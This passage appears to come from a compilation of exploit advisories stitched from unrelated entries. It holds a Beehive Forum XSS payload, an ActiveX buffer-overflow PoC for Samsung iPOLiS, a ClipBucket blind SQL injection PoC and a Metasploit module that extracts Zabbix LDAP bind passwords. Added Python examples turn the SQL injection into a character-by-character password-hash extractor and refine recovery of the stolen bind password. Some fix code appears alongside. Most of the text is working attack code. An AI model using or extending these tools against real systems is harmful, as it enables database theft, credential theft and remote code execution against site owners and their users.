                $error_msg_array[] = gettext("Homepage URL must include http:// schema.");
                $valid = false;

            } else if (!user_check_pref('HOMEPAGE_URL', $user_prefs['HOMEPAGE_URL'])) {

                $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Homepage URL"));
                $valid = false;
            }
        }
    }

    if (isset($_POST['pic_url'])) {

        $user_prefs['PIC_URL'] = trim($_POST['pic_url']);
        $user_prefs_global['PIC_URL'] = (isset($_POST['pic_url_global'])) ? $_POST['pic_url_global'] == "Y" : true;

        if (strlen(trim($user_prefs['PIC_URL'])) > 0) {

            // Same prefix-only test as above
            if (preg_match('/^http:\/\//u', $user_prefs['PIC_URL']) < 1) {

                $error_msg_array[] = gettext("Picture URL must include http:// schema.");
                $valid = false;

            } else if (!user_check_pref('PIC_URL', $user_prefs['PIC_URL'])) {

                $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Picture URL"));
                $valid = false;
            }
        }
    }

    if (strlen(trim($user_prefs['AVATAR_URL'])) > 0) {

        // Same prefix-only test as above
        if (preg_match('/^http:\/\//u', $user_prefs['AVATAR_URL']) < 1) {

            $error_msg_array[] = gettext("Avatar URL must include http:// schema.");
            $valid = false;

        } else if (!user_check_pref('AVATAR_URL', $user_prefs['AVATAR_URL'])) {

            $error_msg_array[] = sprintf(gettext("%s contains invalid characters!"), gettext("Avatar URL"));
            $valid = false;
        }
    }

Solution Fix & Patch:
=====================
Upgrade the script.

Security Risk:
==============
The risk of the vulnerabilities above is estimated as high.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr

Copyright © 2015 | BGA - Bilgi Güvenliği Akademisi
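Added example, not part of the advisory and not Beehive's own code: a Python model of the check in edit_prefs.php above next to a stricter replacement. The advisory only shows the `^http://` prefix test; `user_check_pref()` is not on the page, so the model assumes (as the working sample payload indicates) that it lets the payload's characters through. The href template and all function names below are illustrative.

```python
import re
from html import escape
from urllib.parse import urlsplit

# The advisory's sample payload: it passes a prefix-only check and then breaks
# out of the href attribute when echoed back on the profile page.
SAMPLE_PAYLOAD = "http://\"><script>alert('XSS');</script>"

# Characters that can terminate an attribute or a tag, plus whitespace/controls.
_DANGEROUS = re.compile(r'[<>"\'\s\x00-\x1f]')


def beehive_style_check(url):
    """Model of the edit_prefs.php test: only the leading http:// is enforced.

    Assumption: user_check_pref() (not shown in the advisory) accepts the
    payload's characters, as the working sample payload indicates.
    """
    return re.match(r"^http://", url) is not None


def render_unsafe(url):
    """Hypothetical template that echoes the stored URL into an href verbatim."""
    return '<a href="' + url + '">Homepage</a>'


def validate_url(url, allowed_schemes=("http", "https")):
    """Stricter replacement: parse the URL, allow-list the scheme, require a
    host, and reject any character that could break out of an HTML attribute."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in allowed_schemes or not parts.netloc:
        return False
    return _DANGEROUS.search(url) is None


def render_safe(url):
    """Validate on input *and* encode on output. Either layer alone stops the
    sample payload; both together is the defence in depth a fix should have."""
    if not validate_url(url):
        raise ValueError("rejected URL: " + repr(url))
    return '<a href="' + escape(url, quote=True) + '">Homepage</a>'


if __name__ == "__main__":
    print("prefix check accepts payload:", beehive_style_check(SAMPLE_PAYLOAD))
    print("unsafe render:", render_unsafe(SAMPLE_PAYLOAD))
    print("strict check accepts payload:", validate_url(SAMPLE_PAYLOAD))
    print("safe render:", render_safe("http://example.com/?a=1&b=2"))
```

Note that `javascript:` and data-URI schemes fail the allow-list even though they contain none of the rejected characters; the scheme check and the character check catch different bypasses.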
  23. <!--
# Exploit Title: (0day) Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555

targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"

Operating System    = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2

CERT tried to coordinate but there wasn't any response from Samsung
-->
<head>
<title>Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC</title>
</head>
<body>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'></object>
<script>
// szKey: 15001 'A' bytes, far larger than the control expects
var arg1 = "";
var arg2 = "praveend";
for (var i = 0; i <= 15000; i++) {
    arg1 += "A";
}
// The oversized key overwrites the pointer the control later reads at
// MOV AL,[ESI+EDX] (EDX = [EBP+8] = 0x00414141 in the trace below)
target.WriteConfigValue(arg1, arg2);
</script>
</body>
</html>
<!--
############# Stack Trace ####################

Exception Code: ACCESS_VIOLATION
Disasm: 149434 MOV AL,[ESI+EDX]

Seh Chain:
--------------------------------------------------
1  647C7D7D  mfc100.dll
2  647D0937  mfc100.dll
3  64E242CA  VBSCRIPT.dll
4  77B3E0ED  ntdll.dll

Called From          Returns To
--------------------------------------------------
XNSSDKDEVICE.149434  41414141
41414141             414141
414141               3DA4C4
3DA4C4               mfc100.647790C1
mfc100.647790C1      56746C75

Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C

Block Disassembly:
--------------------------------------------------
149423 XOR EDI,EDI
149425 XOR ESI,ESI
149427 MOV [EBP-8C],ECX
14942D TEST ECX,ECX
14942F JLE SHORT 00149496
149431 MOV EDX,[EBP+8]
149434 MOV AL,[ESI+EDX]      <--- CRASH
149437 CMP AL,2F
149439 JNZ SHORT 00149489
14943B MOV ECX,EBX
14943D TEST ESI,ESI
14943F JNZ SHORT 0014944D
149441 PUSH 159F28
149446 CALL 0014F7C0
14944B JMP SHORT 00149476

ArgDump:
--------------------------------------------------
EBP+8   00414141
EBP+12  003DA4C4 -> Asc: defaultV
EBP+16  647790C1 -> EBE84589
EBP+20  FFFFFFFE
EBP+24  646CBE5C -> CCCCCCC3
EBP+28  0000001C

Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
-->
  24. # Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection
# Date : 20 February 2015
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://clip-bucket.com/
# Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
# Version : 2.7.0.4.v2929-rc3
# Tested on : Windows and Linux

 ,--^----------,--------,-----,-------^--,
 |    |||||||   `--------'     |          O .. CWH Underground Hacking Team ..
 `+---------------------------^----------|
   `\_,-------, _________________________|
     / XXXXXX /`|     /
    / XXXXXX /  `\   /
   / XXXXXX /\______(
  / XXXXXX /
 / XXXXXX /
(________(
 `------'

#################### SOFTWARE DESCRIPTION ####################

ClipBucket is an open-source multimedia management script provided free to the community. This script comes with all the bells & whistles required to start your own video sharing website like Youtube, Metacafe, Veoh, Hulu or any other top video distribution application in a matter of minutes. ClipBucket is the fastest growing script which first started as a Youtube clone, but now its advanced features & enhancements make it the most versatile, reliable & scalable media distribution platform with the latest social networking features, while staying light on your pockets. Whether you are a small fan club or a big multi-tier network operator, ClipBucket will fulfill your video management needs.

##################################
VULNERABILITY: Blind SQL Injection
##################################

An attacker might execute arbitrary SQL commands on the database server with this vulnerability. User-tainted data is used when creating the database query that will be executed on the database management system (DBMS). An attacker can inject their own SQL syntax and thus initiate reading, inserting or deleting database entries, or attack the underlying operating system depending on the query, DBMS and configuration.

= POC =

GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9
  => True Condition

GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9
  => False Condition (Item does not exist.)

################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
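Added example, not from the advisory and not ClipBucket's code: a Python model of the boolean oracle the two PoC requests establish, and what a practitioner does with it next. The database, table names and the query text in `view_item_vulnerable()` are constructed assumptions that reproduce only the flaw the advisory describes (the `item` parameter concatenated into SQL); `extract()` generalises the true/false test into character-by-character extraction of any SQL expression, and `view_item_fixed()` shows the parameterised query that closes the hole.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the ClipBucket database (assumption:
    the real schema differs; only the string-concatenation flaw is modelled)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE items(item TEXT, type TEXT, collection INTEGER);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO items VALUES ('abc123', 'photos', 9);
        INSERT INTO users VALUES ('admin', 'e10adc3949ba59abbe56e057f20f883e');
    """)
    return db


def view_item_vulnerable(db, item, type_, collection):
    """Hypothetical reconstruction of view_item.php: `item` is concatenated into
    the SQL text, so a single quote breaks out of the string literal.
    True = page shows the item, False = 'Item does not exist.'"""
    sql = ("SELECT item FROM items WHERE item = '" + item + "'"
           " AND type = '" + type_ + "' AND collection = " + str(int(collection)))
    return db.execute(sql).fetchone() is not None


def view_item_fixed(db, item, type_, collection):
    """Same query with bound parameters: the quote is data, not syntax."""
    sql = "SELECT item FROM items WHERE item = ? AND type = ? AND collection = ?"
    return db.execute(sql, (item, type_, int(collection))).fetchone() is not None


def oracle(db, condition):
    """Turn the page into a yes/no oracle with the PoC's own breakout
    (a' or 'a'='a): the WHERE clause matches only when `condition` is true,
    because AND binds tighter than OR."""
    payload = "a' or (" + condition + ") and 'a'='a"
    return view_item_vulnerable(db, payload, "photos", 9)


def extract(db, expr, max_len=64):
    """Boolean-based extraction of any SQL expression one character at a time,
    binary-searching the code point: 7 oracle calls per character instead of
    up to 95 linear guesses. coalesce() maps 'past the end' (empty/NULL) to 0,
    which no probe can exceed, so the search converges to 0 and we stop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "coalesce(unicode(substr((%s),%d,1)),0) > %d" % (expr, pos, mid)
            if oracle(db, probe):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = build_db()
    print("PoC true  :", view_item_vulnerable(db, "a' or 'a'='a", "photos", 9))
    print("PoC false :", view_item_vulnerable(db, "a' or 'a'='b", "photos", 9))
    print("fixed     :", view_item_fixed(db, "a' or 'a'='a", "photos", 9))
    print("admin hash:", extract(db, "select password from users where username='admin'"))
```

Against a live target the `oracle()` body would be the HTTP request from the PoC with the payload URL-encoded into `item`, and the true/false decision would be the presence or absence of "Item does not exist." in the response; the rest of the extraction logic is unchanged.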
  25. ##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
#            http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
#            http://seclists.org/fulldisclosure/2013/Sep/151
#            http://www.cvedetails.com/cve/CVE-2013-5572/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ldap_bind_password Zabbix CVE-2013-5572',
      'Description' => %q{
        Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind
        password by leveraging management-console access and reading the
        ldap_bind_password value in the HTML source code.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [ '@pablogonzalezpe, Pablo Gonzalez' ]
    ))

    register_options([
      OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
      OptString.new('TARGETURI', [true, 'Path Zabbix Authentication', '/zabbix/authentication.php']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end

  def run
    req
  end

  def req
    # Fetch authentication.php with an already authenticated admin session cookie;
    # the page echoes the LDAP settings, bind password included, as form field values.
    resp = send_request_cgi({
      'host'         => datastore['RHOST'],
      'method'       => 'POST',
      'uri'          => normalize_uri(target_uri.path.to_s),
      'cookie'       => "zbx_sessionid=#{datastore['zbx_session']}",
      'content-type' => 'application/x-www-form-urlencoded'
    }, datastore['TIMEOUT'])

    if resp.nil?
      print_error "No response from the target (timeout or connection failure)"
      return
    end

    ldap_host(resp)
    user_passDomain(resp)
    user_zabbix(resp)
  end

  # Each extractor slices the raw HTML at `<name>" value="` and reads up to the
  # next double quote.
  def ldap_host(response)
    cut = response.body.split("ldap_host\" value=\"")[1]
    if cut != nil
      host = cut.split("\"")[0]
      print_good "LDAP Host => #{host}"
    end
  end

  def user_passDomain(response)
    cut = response.body.split("ldap_bind_dn\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Domain? => #{user}"
    end

    cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
    if cut != nil
      pass = cut.split("\"")[0]
      print_good "Password Domain? => #{pass}"
    end
  end

  def user_zabbix(response)
    cut = response.body.split("user\" value=\"")[1]
    if cut != nil
      user = cut.split("\"")[0]
      print_good "User Zabbix => #{user}"
    end
  end

end
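Added example, not from the module above and not Zabbix code: a Python parser for the same authentication.php form, to contrast with the split-on-quote extraction the module uses. The point it demonstrates is HTML decoding: a bind password containing `"`, `&` or `<` comes back from the page entity-encoded, so a raw string slice returns the encoded text (or, for a raw `"`, a truncated one), while an HTML tokenizer returns the actual secret. The page below is constructed; the four field names are the ones the module reads, and the rest of the markup is an assumption.

```python
from html.parser import HTMLParser

# Constructed stand-in for the authentication.php response (assumption: the
# real Zabbix 2.0.5 markup differs in layout; only the input names matter).
SAMPLE_PAGE = """
<form method="post" action="authentication.php">
  <input type="hidden" name="sid" value="9f2b1c0d">
  <input type="text" name="ldap_host" value="ldap://dc01.corp.example">
  <input type="text" name="ldap_bind_dn" value="CN=zabbix-svc,OU=Service,DC=corp,DC=example">
  <input type="password" name="ldap_bind_password" value="p&amp;ss&quot;w0rd&lt;1&gt;">
  <input type="text" name="user" value="Admin">
</form>
"""

# The fields the Metasploit module above prints.
WANTED = ("ldap_host", "ldap_bind_dn", "ldap_bind_password", "user")


class InputCollector(HTMLParser):
    """Collects name -> value for every <input>; html.parser un-escapes
    entity references in attribute values, so the stored value is the
    real one, not its HTML-encoded form."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attrs = dict(attrs)
        name = attrs.get("name")
        if name:
            self.fields[name] = attrs.get("value") or ""


def extract_with_parser(page):
    """Robust extraction: tokenises the HTML, so attribute order, quoting
    style and encoded characters in the secret do not matter."""
    p = InputCollector()
    p.feed(page)
    return {k: p.fields[k] for k in WANTED if k in p.fields}


def extract_with_split(page, name):
    """The module's approach, for comparison: slice the raw text at
    name="..." value=" and read to the next quote. Returns the value still
    entity-encoded, or None when the marker is absent."""
    cut = page.split('name="%s" value="' % name)
    if len(cut) < 2:
        return None
    return cut[1].split('"')[0]


if __name__ == "__main__":
    for k, v in extract_with_parser(SAMPLE_PAGE).items():
        print("%-20s %s" % (k, v))
    print("split() sees:", extract_with_split(SAMPLE_PAGE, "ldap_bind_password"))
```

The decoded bind password is what an attacker would actually use against the directory; an encoded one taken from a raw slice fails the LDAP bind and can send an assessment down a false trail.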